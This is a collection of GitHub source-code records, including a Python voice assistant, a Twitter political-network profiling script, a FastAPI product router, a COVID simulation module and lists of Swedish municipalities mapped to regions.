\"https://www.google.com/maps/place/\" + \"\".join(location)\r\n        speak(\"This is where \" + str(location) + \" is.\")\r\n        webbrowser.open(url)\r\n\r\n    elif \"search\" in query.lower():\r\n        ind = query.lower().split().index(\"search\")\r\n        search = query.split()[ind + 1:]\r\n        webbrowser.open(\r\n            \"https://www.google.com/search?q=\" + \"+\".join(search))\r\n        speak(\"Searching \" + str(search) + \" on google\")\r\n\r\n    elif \"weather\" in query:\r\n        key = \"XXXX\"\r\n        weather_url = \"http://api.openweathermap.org/data/2.5/weather?\"\r\n        ind = query.split().index(\"in\")\r\n        location = query.split()[ind + 1:]\r\n        location = \"\".join(location)\r\n        url = weather_url + \"appid=\" + key + \"&q=\" + location\r\n        js = requests.get(url).json()\r\n        if js[\"cod\"] != \"404\":\r\n            weather = js[\"main\"]\r\n            temperature = weather[\"temp\"]\r\n            temperature = temperature - 273.15\r\n            humidity = weather[\"humidity\"]\r\n            desc = js[\"weather\"][0][\"description\"]\r\n            weather_response = \" The temperature in Celsius is \" + str(temperature) + \" The humidity is \" + str(\r\n                humidity) + \" and The weather description is \" + str(desc)\r\n            print(weather_response)\r\n            speak(weather_response)\r\n        else:\r\n            speak(\"City Not Found\")\r\n\r\n    elif \"play\" in query :\r\n        website = query.split('play')\r\n        webbrowser.open(\"https://www.youtube.com/results?search_query=\" + \"+\".join(website))\r\n        print(\"playing \" + str(website) + \" on youtube\")\r\n        speak(\"playing \" + str(website) + \" on youtube\")\r\n\r\n\r\n    elif \"sleep\" in query or \"stop\" in query or \"do not listen\" in query:\r\n        speak(\"for 
how many seconds do you want me to sleep\")\n a = int(takecmd())\n pause.sleep(a)\n speak(str(a) + f\" seconds completed {MASTER}. Now you can ask me anything\")\n\n elif \"goodbye\" in query :\n speak(f\"My pleasure to help you {MASTER}, See you later\")\n return 0\n\n\n else:\n speak(\"It seems its out of my own way lets try it later !\")\n\n\nwhile True:\n if assistant(takecmd().lower())==0:\n break\n","repo_name":"Rutvik84/Python-Projects","sub_path":"Virtual Assistant/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":8047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74801871283","text":"import sys\nimport os\nfrom pathlib import Path\nimport time\n\nweb_path = os.path.join(Path(os.path.abspath(\"./\")).parents[0], 'web')\nsys.path.append(os.path.join(os.getcwd(), 'twitter_graph_iterator'))\nsys.path.append(os.path.join(os.getcwd(), 'twitter_node_generator'))\nsys.path.append(os.path.join(os.getcwd(), 'profile_twitter_user'))\nsys.path.append(web_path)\nsys.path.append(os.path.join(os.getcwd(), 'pbd_graph_iterator'))\n\nfrom iterator import GraphIterator\nfrom node_generator import NodeGenerator\nfrom api import twitterAPIWrapper\nfrom ms_profiler import MSProfileUser\n\nfrom pbd_graph_iterator import pbditerator\nfrom render_website import render\n\nfrom pathlib import Path\nfrom ast import literal_eval\n\nimport pickle\nimport argparse\n\nimport numpy as np\n\ndefault_path = Path(os.path.abspath(\"./\")).parents[0]\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--path', dest='path', type=str, required=False, default=default_path)\nparser.add_argument('--iter', dest='iterations', type=int, required=False, default=120)\nparser.add_argument('--names', nargs='+', dest='names', required=False, default=[])\nparser.add_argument('--pbditer', dest='pbditer', required=False, default=320, type=int)\nparser.add_argument('--featureiter', dest='featureiter', required=False, default=130, type=int)\nparser.add_argument('--profile', dest='profile', required=False, default='', type=str)\nparser.add_argument('--mcsamples', dest='mcsamples', required=False, default=1200, type=int)\nparser.add_argument('--fmcsamples', dest='fmcsamples', required=False, default=200, type=int)\nparser.add_argument('-show', dest='show', action='store_true')\nparser.add_argument('-train', dest='train', action='store_true')\nparser.add_argument('--partyprofile', dest='partyprofile', action='store_true')\nparser.add_argument('--setparty', dest='setparty', type=str, default='')\nparser.add_argument('-add', '--addnodes', nargs='+', dest='addnodes', required=False)\nparser.add_argument('-c', '--connect', dest='con', required=False)\n\nargs = parser.parse_args()\ngraph = None\ngraph_iterator = None\n\ntry:\n stored_graph = open(os.path.join(args.path, 'data/graph'), 'rb')\n if stored_graph is not None:\n graph = pickle.load(stored_graph)\nexcept FileNotFoundError:\n pass\n\nwith open(os.path.join(Path(os.path.abspath(\"./\")).parents[0], 'twitter_creds/creds.txt'), 'r') as file:\n CREDENTIALS = literal_eval(file.read())\n if len(args.names) == 0:\n names = ['@Spolitik',\n '@NyeBorgerlige',\n '@DanskDf1995',\n '@KonservativeDK',\n '@venstredk',\n '@radikale',\n '@LiberalAlliance',\n '@SFpolitik',\n '@Enhedslisten',\n '@alternativet_',\n '@friegronne',\n '@veganerpartiet',\n \"@KDDanmark\",\n ]\n else:\n names = args.names\n if not graph:\n graph_iterator = GraphIterator(NodeGenerator(CREDENTIALS), seed_names=names)\n else:\n 
graph_iterator = graph\n graph_iterator.seed_names = names\n\n if args.addnodes and len(args.addnodes) > 0:\n for node_handle in args.addnodes:\n graph_iterator.expand_graph(node_handle)\n\nif args.profile != '' and args.setparty == '':\n profiler = MSProfileUser(name=args.profile, graph=graph)\n maxlikelihood = profiler(samples=args.mcsamples, fsamples=args.fmcsamples, search_connection=args.con)\n print('')\n print('--# Best Result #--')\n print(maxlikelihood)\n\n if args.show:\n profiler.show()\n\nif args.partyprofile:\n payload = []\n party_members = []\n for node_id in graph.nodes:\n node = graph.nodes[node_id]\n if node.party:\n payload.append(node.id)\n party_members.append(node.name)\n\n profiler = MSProfileUser(name=payload, graph=graph)\n E = profiler(samples=args.mcsamples, fsamples=args.fmcsamples)\n\n if args.show:\n profiler.show()\n\nif args.setparty != '' and args.profile != '':\n node = NodeGenerator(CREDENTIALS).new(args.profile, args.setparty)\n if not node.id in graph.nodes:\n raise ValueError('Profile not found in graph')\n\n write_file = open(os.path.join(args.path, 'data/graph'), 'wb')\n pickle.dump(graph, write_file)\n write_file.close()\n\nif args.train:\n while True:\n for i in range(args.iterations):\n graph_iterator.next()\n print('ITERATION: {}'.format(i))\n print('Progress: {} %'.format((1 + i) / args.iterations * 100))\n print('Graph Size: {}'.format(len(graph_iterator.nodes.keys())))\n print('------------')\n\n pbd_iterator = pbditerator.PbdGraphIterator(graph_iterator)\n pbd_iterator(iterations=int(args.pbditer))\n\n write_file = open(os.path.join(args.path, 'data/graph'), 'wb')\n pickle.dump(pbd_iterator.graph, write_file)\n write_file.close()\n render(pbd_iterator.graph)\n\n for i in range(args.featureiter):\n keys = list(graph.nodes.keys())\n pick_random_index = np.random.randint(low=0, high=len(keys)-1)\n random_node = graph.nodes[keys[pick_random_index]]\n\n profiler = MSProfileUser(name=random_node.screen_name, graph=graph)\n maxlikelihood = profiler(samples=args.mcsamples, fsamples=args.fmcsamples, search_connection=args.con)\n\n if maxlikelihood:\n print(' ------------ ')\n print('Setting feature for: ', random_node.name, 'with:', maxlikelihood)\n random_node.set_party(maxlikelihood)\n\n write_file = open(os.path.join(args.path, 'data/graph'), 'wb')\n pickle.dump(graph, write_file)\n write_file.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"asgerMe/SocialNetworkSegmentation","sub_path":"source/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41284381516","text":"from fastapi import APIRouter,status, Depends, HTTPException\nfrom src.schemas.schemas import Produto, ProdutoOut,ProdutoEditar,ProdutoSimples, Usuario\nfrom src.infra.sqlalchemy.repositorios.repositorioProduto import RepositorioProduto\nfrom sqlalchemy.orm import Session\nfrom typing import List\nfrom src.infra.sqlalchemy.config.database import get_db \nfrom src.routers.auth_utils import obter_usuario_logado\n\nrouter = APIRouter()\n\n@router.post('/produtos',status_code=status.HTTP_201_CREATED,response_model=ProdutoOut)\ndef criar_produto(produto: Produto,usuario = Depends(obter_usuario_logado), db:Session = Depends(get_db)):\n produto.usuario_id =usuario.id\n produto_criado = RepositorioProduto(db).criar(produto)\n return produto_criado\n\n\n@router.get('/produtos',status_code=status.HTTP_200_OK, response_model=List[ProdutoOut])\ndef 
listar_produto(db:Session = Depends(get_db)):\n produto_listar = RepositorioProduto(db).listar()\n return produto_listar\n\n@router.put('/produtos/{id}',response_model=ProdutoSimples)\ndef atualizar_produto(id:int,produto: ProdutoEditar, session :Session = Depends(get_db)):\n RepositorioProduto(session).editar(id,produto)\n produto.id =id\n return produto\n\n@router.delete('/produtos/{id}')\ndef remover_produto(id:int, session :Session = Depends(get_db)):\n RepositorioProduto(session).remover(id)\n return {\"Produto\":\"Removido com Sucesso\"}\n\n@router.get('/meus_produtos',response_model=list[ProdutoOut])\ndef exibr_produto_Id(usuario: Usuario = Depends(obter_usuario_logado), session: Session=Depends(get_db)):\n produto_localizado = RepositorioProduto(session).buscarPorId(usuario.id)\n if not produto_localizado:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail = f'Não há um produto com id = {id}')\n return produto_localizado\n\n","repo_name":"KarMiguel/FastApi-Python-BLX","sub_path":"src/routers/rotas_produtos.py","file_name":"rotas_produtos.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"24505487608","text":"import requests\nfrom requests.auth import HTTPBasicAuth\n\nurl_employee = \"http://dummy.restapiexample.com/api/v1/employee/9\"\nr = requests.get(url = url_employee,headers ={'User-Agent': 'Bhatti'})\ndata = r.json()\n\n# print(r.status_code)\n# print(r)\n#\n# print(data['status'])\n# print(data['data'])\n\nfor status in data:\n print (status)","repo_name":"zulqurnainbhatti/oldrepo","sub_path":"employee_get.py","file_name":"employee_get.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7789149803","text":"\"\"\"Functions used for the simulations\"\"\"\n\nimport numpy as np\n\nfrom covid.config import MAX_X\nfrom covid.model import Patient, Virus\n\n\ndef new_patients(\n n,\n mortality_thresh=0.95,\n isolate_thresh=0.5,\n vel_std=0.1,\n severity_score_mean=0.1,\n severity_score_std=0.4,\n infection_length_mean=19,\n infection_length_std=3.0,\n infection_prob_mean=1.0,\n infection_prob_std=1.0,\n proactive_isolate_frac=0.0,\n **kwargs,\n):\n \"\"\"\n returns a list of new Patients. 
Parameters are determined by statistical distributions:\n    - velocity and infection length are normally distributed\n    - severity and infection prob are the absolute value of a normal distribution, clipped to the range [0, 1]\n    - x, y coordinates of initial position are normal, clipped to the dimensions of the box\n\n    Parameters\n    ----------\n    n : int\n        num people\n    mortality_thresh : float (0->1)\n        threshold for death\n    isolate_thresh : float (0->1)\n        threshold before a person self-isolates\n    vel_std : float\n        standard deviation of a person's velocity\n    severity_score_mean : float (0->1)\n        determines the magnitude of how severe the average case is\n    severity_score_std : float\n        standard deviation of the above\n    infection_length_mean : float\n        determines how long an average case is\n    infection_length_std : float\n        standard deviation of the above\n    infection_prob_mean : float (0->1)\n        determines the average infection probability on contact between\n        a susceptible and an infected person.\n    infection_prob_std : float\n        standard deviation of the above\n    proactive_isolate_frac : float (0->1)\n        fraction of people who proactively self-isolate by staying in place.\n        a fraction of these people can interact with people who approach them\n        but the rest do not interact at all.\n\n    Returns\n    -------\n    List[Patient]\n\n    \"\"\"\n    pos = 2 * MAX_X * np.random.random_sample(size=(n, 2)) - MAX_X\n    vel = np.random.normal(loc=0, scale=vel_std, size=(n, 2))\n    infect_len = np.fabs(\n        np.random.normal(loc=infection_length_mean, scale=infection_length_std, size=n)\n    )\n\n    proactive_isolate = np.random.choice(\n        [True, False], p=[proactive_isolate_frac, 1.0 - proactive_isolate_frac], size=n\n    )\n\n    _severity = np.fabs(np.random.normal(loc=severity_score_mean, scale=severity_score_std, size=n))\n    severity = np.clip(_severity, 0.0, 1.0)\n\n    _infect = np.fabs(np.random.normal(loc=infection_prob_mean, scale=infection_prob_std, size=n))\n    infection_prob = np.clip(_infect, 0.0, 1.0)\n    infections = [\n        Virus(\n            infection_severity=severity[i],\n            infection_length=infect_len[i],\n            infection_prob=infection_prob[i],\n            active=False,\n            immune=False,\n        )\n        for i in range(n)\n    ]\n    return [\n        Patient(\n            x=pos[i][0],\n            y=pos[i][1],\n            vx=vel[i][0],\n            vy=vel[i][1],\n            infection=infections[i],\n            mortality_thresh=mortality_thresh,\n            isolate_thresh=isolate_thresh,\n            isolate_behavior=proactive_isolate[i],\n        )\n        for i in range(n)\n    ]\n\n\ndef add_remove_patients(num_new, num_remove, patients, **kwargs):\n    \"\"\"\n    Add and remove patients\n\n    Parameters\n    ----------\n    num_new : int\n    num_remove : int\n    patients : List[Patient]\n\n    Other Parameters\n    ----------------\n    outside_infections: int (default num_new // 100)\n        new infections coming from newly added people\n\n    Returns\n    -------\n    List[Patient]\n    \"\"\"\n    # extend the list with new patients\n    if num_new > 0:\n        new_people = new_patients(num_new, **kwargs)\n        n_infect = kwargs.get(\"outside_infections\", num_new // 100)\n        randomly_infect(new_people, n_infect)\n        patients.extend(new_people)\n    # remove some patients\n    if num_remove > 0:\n        np.random.shuffle(patients)\n        patients = [x for i, x in enumerate(patients) if i > num_remove or x.is_dead]\n    return patients\n\n\ndef randomly_infect(patient_lst, n_infect):\n    \"\"\"\n    randomly infect elements of a list\n\n    Parameters\n    ----------\n    patient_lst : List[Patient]\n    n_infect : int\n\n    Returns\n    -------\n    None\n    \"\"\"\n    for i in range(n_infect):\n        
patient_lst[i].infection.infect()\n","repo_name":"MENZI-MCHUNU/covid19","sub_path":"covid/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"27919436704","text":"CITYS = [\n    \"alingsås\",\n    \"arboga\",\n    \"arvika\",\n    \"askersund\",\n    \"avesta\",\n    \"boden\",\n    \"bollnäs\",\n    \"borgholm\",\n    \"borlänge\",\n    \"borås\",\n    \"vänersborgs stad\",\n    \"båstad\",\n    \"kristianstads län\",\n    \"djursholm \",\n    \"eksjö\",\n    \"enköping\",\n    \"eskilstuna\",\n    \"eslöv\",\n    \"fagersta\",\n    \"falkenberg\",\n    \"falköping\",\n    \"skanör med falsterbo stad\",\n    \"falun\",\n    \"filipstad\",\n    \"flen\",\n    \"gränna\",\n    \"gävle\",\n    \"göteborg\",\n    \"hagfors\",\n    \"halmstad\",\n    \"haparanda\",\n    \"hedemora\",\n    \"helsingborg\",\n    \"hjo\",\n    \"hudiksvall\",\n    \"huskvarna\",\n    \"härnösand\",\n    \"hässleholm\",\n    \"kristianstads län\",\n    \"höganäs\",\n    \"jönköping\",\n    \"kalmar\",\n    \"karl johans stad\",\n    \"karlshamn\",\n    \"karlskoga\",\n    \"karlskrona\",\n    \"karlstad\",\n    \"katrineholm\",\n    \"kiruna\",\n    \"kramfors\",\n    \"kristianstad\",\n    \"kristianstads län\",\n    \"kristinehamn\",\n    \"kumla\",\n    \"kungsbacka\",\n    \"kungälv\",\n    \"köping\",\n    \"laholm\",\n    \"landskrona\",\n    \"lidingö\",\n    \"lidköping\",\n    \"lindesberg\",\n    \"linköping\",\n    \"ljungby\",\n    \"ludvika\",\n    \"luleå\",\n    \"lund\",\n    \"kristianstads län\",\n    \"lycksele\",\n    \"lysekil\",\n    \"malmö\",\n    \"mariefred\",\n    \"mariestad\",\n    \"marstrand\",\n    \"mjölby\",\n    \"motala\",\n    \"mölndal\",\n    \"mönsterås\",\n    \"nacka\",\n    \"nora\",\n    \"norrköping\",\n    \"norrtälje\",\n    \"nybro\",\n    \"nyköping\",\n    \"nynäshamn\",\n    \"nässjö\",\n    \"oskarshamn\",\n    \"oxelösund\",\n    \"piteå\",\n    \"ronneby\",\n    \"sala\",\n    \"sandviken\",\n    \"sigtuna\",\n    \"simrishamn\",\n    \"kristianstads län\",\n    \"skanör med falsterbo stad\",\n    \"skanör med falsterbo\",\n    \"skara\",\n    \"skellefteå\",\n    \"skänninge\",\n    \"skövde\",\n    \"sollefteå\",\n    \"solna\",\n    \"stockholm\",\n    \"strängnäs\",\n    \"strömstad\",\n    \"sundbyberg\",\n    \"sundsvall\",\n    \"säffle\",\n    \"säter\",\n    \"sävsjö\",\n    \"söderhamn\",\n    \"söderköping\",\n    \"södertälje\",\n    \"sölvesborg\",\n    \"tidaholm\",\n    \"torget\",\n    \"torshälla\",\n    \"tranås\",\n    \"trelleborg\",\n    \"trollhättan\",\n    \"trosa\",\n    \"kristianstads län\",\n    \"uddevalla\",\n    \"ulricehamn\",\n    \"umeå\",\n    \"uppsala\",\n    \"vadstena\",\n    \"varberg\",\n    \"vaxholm\",\n    \"vetlanda\",\n    \"vimmerby\",\n    \"visby\",\n    \"kristianstads län\",\n    \"kristianstads kommun\",\n    \"vänersborg\",\n    \"värnamo\",\n    \"västervik\",\n    \"västerås\",\n    \"växjö\",\n    \"ystad\",\n    \"kristianstads län\",\n    \"kristianstads kommun\",\n    \"åmål\",\n    \"älvsborg\",\n    \"ängelholm\",\n    \"kristianstads län\",\n    \"örebro\",\n    \"öregrund\",\n    \"örnsköldsvik\",\n    \"östersund\",\n    \"östhammar\"\n]\n\nFA_REGION = [\n    \"malmö\",\n    \"lund\",\n    \"vansbro\",\n    \"kristianstad\",\n    \"hässleholm\",\n    \"ludvika\",\n    \"karlskrona\",\n    \"avesta\",\n    \"hedemora\",\n    \"älmhult\",\n    \"osby\",\n    \"falun\",\n    \"borlänge\",\n    \"ljungby\",\n    \"mora\",\n    \"halmstad\",\n    \"gävle\",\n    \"värnamo\",\n    \"bollnäs\",\n    \"ovanåker\",\n    \"växjö\",\n    \"hudiksvall\",\n    \"kalmar\",\n    \"ljusdal\",\n    \"oskarshamn\",\n    \"härjedalen\",\n    \"västervik\",\n    \"östersund\",\n    \"vimmerby\",\n    \"sundsvall\",\n    \"jönköping\",\n    \"kramfors\",\n    \"borås\",\n    \"örnsköldsvik\",\n    \"göteborg\",\n    \"sollefteå\",\n    \"trollhättan\",\n    \"vänersborg\",\n    \"strömsund\",\n    \"lidköping\",\n    \"götene\",\n    \"åsele\",\n    \"skövde\",\n    \"skara\",\n    \"umeå\",\n    \"linköping\",\n    \"norrköping\",\n    \"lycksele\",\n    \"gotland\",\n    \"vilhelmina\",\n    \"nyköping\",\n    \"oxelösund\",\n    \"storuman\",\n    \"eskilstuna\",\n    \"skellefteå\",\n    \"stockholm\",\n    \"arvidsjaur\",\n    \"västerås\",\n    \"arjeplog\",\n    \"örebro\",\n    \"luleå\",\n    \"karlskoga\",\n    \"haparanda\",\n    \"karlstad\",\n    \"överkalix\",\n    \"västlandet\",\n    \"jokkmokk\",\n    \"torsby\",\n    \"gällivare\",\n    \"malung\",\n    \"sälen\",\n    \"kiruna\",\n]\n\nMUNICIPALITY_TO_FA = {\n    \"svalöv\": \"malmö-lund\",\n    \"staffanstorp\": \"malmö-lund\",\n    \"burlöv\": \"malmö-lund\",\n    \"vellinge\": \"malmö-lund\",\n    \"örkelljunga\": \"malmö-lund\",\n    \"bjuv\": \"malmö-lund\",\n    \"kävlinge\": \"malmö-lund\",\n    \"lomma\": \"malmö-lund\",\n    \"svedala\": \"malmö-lund\",\n    \"skurup\": \"malmö-lund\",\n    \"sjöbo\": \"malmö-lund\",\n    \"hörby\": \"malmö-lund\",\n    \"höör\": \"malmö-lund\",\n    \"tomelilla\": \"malmö-lund\",\n    \"perstorp\": \"malmö-lund\",\n    \"klippan\": \"malmö-lund\",\n    \"åstorp\": \"malmö-lund\",\n    \"båstad\": \"malmö-lund\",\n    \"malmö\": \"malmö-lund\",\n    \"lund\": \"malmö-lund\",\n    \"landskrona\": \"malmö-lund\",\n    \"helsingborg\": \"malmö-lund\",\n    \"höganäs\": \"malmö-lund\",\n    \"eslöv\": \"malmö-lund\",\n    \"ystad\": \"malmö-lund\",\n    \"trelleborg\": \"malmö-lund\",\n    \"simrishamn\": \"malmö-lund\",\n    \"ängelholm\": \"malmö-lund\",\n    \"sölvesborg\": \"kristianstad-hässleholm\",\n    \"östra göinge\": \"kristianstad-hässleholm\",\n    \"bromölla\": \"kristianstad-hässleholm\",\n    \"kristianstad\": \"kristianstad-hässleholm\",\n    \"hässleholm\": \"kristianstad-hässleholm\",\n    \"olofström\": \"karlskrona\",\n    \"karlskrona\": \"karlskrona\",\n    \"ronneby\": \"karlskrona\",\n    \"karlshamn\": \"karlskrona\",\n    \"älmhult\": \"älmhult-osby\",\n    \"osby\": \"älmhult-osby\",\n    \"ljungby\": \"ljungby\",\n    \"markaryd\": \"ljungby\",\n    \"hylte\": \"halmstad\",\n    \"halmstad\": \"halmstad\",\n    \"laholm\": \"halmstad\",\n    \"gnosjö\": \"värnamo\",\n    \"gislaved\": \"värnamo\",\n    \"värnamo\": \"värnamo\",\n    \"uppvidinge\": \"växjö\",\n    \"lessebo\": \"växjö\",\n    \"tingsryd\": \"växjö\",\n    \"växjö\": \"växjö\",\n    \"torsås\": \"kalmar\",\n    \"mörbylånga\": \"kalmar\",\n    \"mönsterås\": \"kalmar\",\n    \"emmaboda\": \"kalmar\",\n    \"kalmar\": \"kalmar\",\n    \"nybro\": \"kalmar\",\n    \"borgholm\": \"kalmar\",\n    \"högsby\": \"oskarshamn\",\n    \"oskarshamn\": \"oskarshamn\",\n    \"västervik\": \"västervik\",\n    \"hultsfred\": \"vimmerby\",\n    \"vimmerby\": \"vimmerby\",\n    \"ydre\": \"jönköping\",\n    \"aneby\": \"jönköping\",\n    \"mullsjö\": \"jönköping\",\n    \"habo\": \"jönköping\",\n    \"vaggeryd\": \"jönköping\",\n    \"jönköping\": \"jönköping\",\n    \"nässjö\": \"jönköping\",\n    \"sävsjö\": \"jönköping\",\n    \"vetlanda\": \"jönköping\",\n    \"eksjö\": \"jönköping\",\n    \"tranås\": \"jönköping\",\n    \"borås\": \"borås\",\n    \"tranemo\": \"borås\",\n    \"svenljunga\": \"borås\",\n    \"ulricehamn\": \"borås\",\n    \"falkenberg\": \"göteborg\",\n    \"varberg\": \"göteborg\",\n    \"kungsbacka\": \"göteborg\",\n    \"härryda\": \"göteborg\",\n    \"partille\": \"göteborg\",\n    \"öckerö\": \"göteborg\",\n    \"stenungsund\": \"göteborg\",\n    \"tjörn\": \"göteborg\",\n    \"orust\": \"göteborg\",\n    \"ale\": \"göteborg\",\n    \"lerum\": \"göteborg\",\n    \"vargårda\": \"göteborg\",\n    \"bollebygd\": \"göteborg\",\n    \"lilla edet\": \"göteborg\",\n    \"mark\": \"göteborg\",\n    \"herrljunga\": \"göteborg\",\n    \"göteborg\": \"göteborg\",\n    \"mölndal\": \"göteborg\",\n    \"kungälv\": \"göteborg\",\n    \"alingssås\": \"göteborg\",\n    \"sotenäs\": \"trollhättan-vänersborg\",\n    \"munkedal\": 
\"trollhättan-vänersborg\",\n \"färgelanda\": \"trollhättan-vänersborg\",\n \"grästorp\": \"trollhättan-vänersborg\",\n \"mellerud\": \"trollhättan-vänersborg\",\n \"lysekil\": \"trollhättan-vänersborg\",\n \"uddevalla\": \"trollhättan-vänersborg\",\n \"vänersborg\": \"trollhättan-vänersborg\",\n \"trollhättan\": \"trollhättan-vänersborg\",\n \"essunga\": \"lidköping-götene\",\n \"vara\": \"lidköping-götene\",\n \"götene\": \"lidköping-götene\",\n \"lidköping\": \"lidköping-götene\",\n \"karlsborg\": \"skövde-skara\",\n \"gullspång\": \"skövde-skara\",\n \"tibro\": \"skövde-skara\",\n \"töreboda\": \"skövde-skara\",\n \"mariestad\": \"skövde-skara\",\n \"skara\": \"skövde-skara\",\n \"skövde\": \"skövde-skara\",\n \"hjo\": \"skövde-skara\",\n \"tidaholm\": \"skövde-skara\",\n \"falköping\": \"skövde-skara\",\n \"ödeshög\": \"linköping-norrköping\",\n \"kinda\": \"linköping-norrköping\",\n \"boxholm\": \"linköping-norrköping\",\n \"åtvidaberg\": \"linköping-norrköping\",\n \"finspång\": \"linköping-norrköping\",\n \"valdemarsvik\": \"linköping-norrköping\",\n \"linköping\": \"linköping-norrköping\",\n \"norrköping\": \"linköping-norrköping\",\n \"söderköping\": \"linköping-norrköping\",\n \"motala\": \"linköping-norrköping\",\n \"vadstena\": \"linköping-norrköping\",\n \"mjölby\": \"linköping-norrköping\",\n \"gotland\": \"gotland\",\n \"nyköping\": \"nyköping-oxelösund\",\n \"oxelösund\": \"nyköping-oxelösund\",\n \"vingåker\": \"eskilstuna\",\n \"katrineholm\": \"eskilstuna\",\n \"eskilstuna\": \"eskilstuna\",\n \"upplands väsby\": \"stockholm\",\n \"vallentuna\": \"stockholm\",\n \"österåker\": \"stockholm\",\n \"värmdö\": \"stockholm\",\n \"järfälla\": \"stockholm\",\n \"ekerö\": \"stockholm\",\n \"huddinge\": \"stockholm\",\n \"botkyrka\": \"stockholm\",\n \"salem\": \"stockholm\",\n \"haninge\": \"stockholm\",\n \"tyresö\": \"stockholm\",\n \"upplands-bro\": \"stockholm\",\n \"nykvarn\": \"stockholm\",\n \"täby\": \"stockholm\",\n \"danderyd\": \"stockholm\",\n \"sollentuna\": \"stockholm\",\n \"stockholm\": \"stockholm\",\n \"södertälje\": \"stockholm\",\n \"nacka\": \"stockholm\",\n \"sundbyberg\": \"stockholm\",\n \"solna\": \"stockholm\",\n \"lidingö\": \"stockholm\",\n \"vaxholm\": \"stockholm\",\n \"norrtälje\": \"stockholm\",\n \"sigtuna\": \"stockholm\",\n \"nynäshamn\": \"stockholm\",\n \"håbo\": \"stockholm\",\n \"knivsta\": \"stockholm\",\n \"heby\": \"stockholm\",\n \"tierp\": \"stockholm\",\n \"uppsala\": \"stockholm\",\n \"enköping\": \"stockholm\",\n \"östhammar\": \"stockholm\",\n \"gnesta\": \"stockholm\",\n \"flen\": \"stockholm\",\n \"strängnäs\": \"stockholm\",\n \"trosa\": \"stockholm\",\n \"skinnskatteberg\": \"västerås\",\n \"surahammar\": \"västerås\",\n \"kungsör\": \"västerås\",\n \"hallstahammar\": \"västerås\",\n \"norberg\": \"västerås\",\n \"västerås\": \"västerås\",\n \"sala\": \"västerås\",\n \"fagersta\": \"västerås\",\n \"köping\": \"västerås\",\n \"arboga\": \"västerås\",\n \"lekeberg\": \"örebro\",\n \"laxå\": \"örebro\",\n \"hallsberg\": \"örebro\",\n \"hällefors\": \"örebro\",\n \"ljusnarsberg\": \"örebro\",\n \"örebro\": \"örebro\",\n \"kumla\": \"örebro\",\n \"askersund\": \"örebro\",\n \"nora\": \"örebro\",\n \"lindesberg\": \"örebro\",\n \"degerfors\": \"karlskoga\",\n \"karlskoga\": \"karlskoga\",\n \"åmål\": \"karlstad\",\n \"kil\": \"karlstad\",\n \"storfors\": \"karlstad\",\n \"hammarö\": \"karlstad\",\n \"munkfors\": \"karlstad\",\n \"forshaga\": \"karlstad\",\n \"grums\": \"karlstad\",\n \"sunne\": \"karlstad\",\n \"karlstad\": 
\"karlstad\",\n \"kristinehamn\": \"karlstad\",\n \"filipstad\": \"karlstad\",\n \"hagfors\": \"karlstad\",\n \"arvika\": \"karlstad\",\n \"säffle\": \"karlstad\",\n \"tanum\": \"västlandet\",\n \"dals-ed\": \"västlandet\",\n \"bengtsfors\": \"västlandet\",\n \"strömstad\": \"västlandet\",\n \"eda\": \"västlandet\",\n \"årjäng\": \"västlandet\",\n \"torsby\": \"torsby\",\n \"malung\": \"malung-sälen\",\n \"sälen\": \"malung-sälen\",\n \"vansbro\": \"vansbro\",\n \"smedjebacken\": \"ludvika\",\n \"ludvika\": \"ludvika\",\n \"hedemora\": \"avesta-hedemora\",\n \"avesta\": \"avesta-hedemora\",\n \"gagnef\": \"falun-borlänge\",\n \"leksand\": \"falun-borlänge\",\n \"rättvik\": \"falun-borlänge\",\n \"falun\": \"falun-borlänge\",\n \"borlänge\": \"falun-borlänge\",\n \"säter\": \"falun-borlänge\",\n \"orsa\": \"mora\",\n \"älvdalen\": \"mora\",\n \"mora\": \"mora\",\n \"älvkarleby\": \"gävle\",\n \"ockelbo\": \"gävle\",\n \"hofors\": \"gävle\",\n \"gävle\": \"gävle\",\n \"sandviken\": \"gävle\",\n \"ovanåker\": \"bollnäs-ovanåker\",\n \"söderhamn\": \"bollnäs-ovanåker\",\n \"bollnäs\": \"bollnäs-ovanåker\",\n \"nordanstrig\": \"hudiksvall\",\n \"hudiksvall\": \"hudiksvall\",\n \"ljusdal\": \"ljusdal\",\n \"härjedalen\": \"härjedalen\",\n \"ragunda\": \"östersund\",\n \"bräcke\": \"östersund\",\n \"krokom\": \"östersund\",\n \"åre\": \"östersund\",\n \"berg\": \"östersund\",\n \"östersund\": \"östersund\",\n \"ånge\": \"sundsvall\",\n \"timrå\": \"sundsvall\",\n \"härnösand\": \"sundsvall\",\n \"sundsvall\": \"sundsvall\",\n \"kramfors\": \"kramfors\",\n \"örnsköldsvik\": \"örnsköldsvik\",\n \"sollefteå\": \"sollefteå\",\n \"strömsund\": \"strömsund\",\n \"dorotea\": \"strömsund\",\n \"åsele\": \"åsele\",\n \"nordmaling\": \"umeå\",\n \"bjurholm\": \"umeå\",\n \"vindeln\": \"umeå\",\n \"robertsfors\": \"umeå\",\n \"vännäs\": \"umeå\",\n \"umeå\": \"umeå\",\n \"lycksele\": \"lycksele\",\n \"malå\": \"lycksele\",\n \"villhelmina\": \"villhelmina\",\n \"storuman\": \"storuman\",\n \"skellefteå\": \"skellefteå\",\n \"norsjö\": \"skellefteå\",\n \"arvidsjaur\": \"arvidsjaur\",\n \"sorsele\": \"arjeplog\",\n \"arjeplog\": \"arjeplog\",\n \"kalix\": \"luleå\",\n \"övertorneå\": \"luleå\",\n \"älvsbyn\": \"luleå\",\n \"luleå\": \"luleå\",\n \"piteå\": \"luleå\",\n \"boden\": \"luleå\",\n \"haparanda\": \"haparanda\",\n 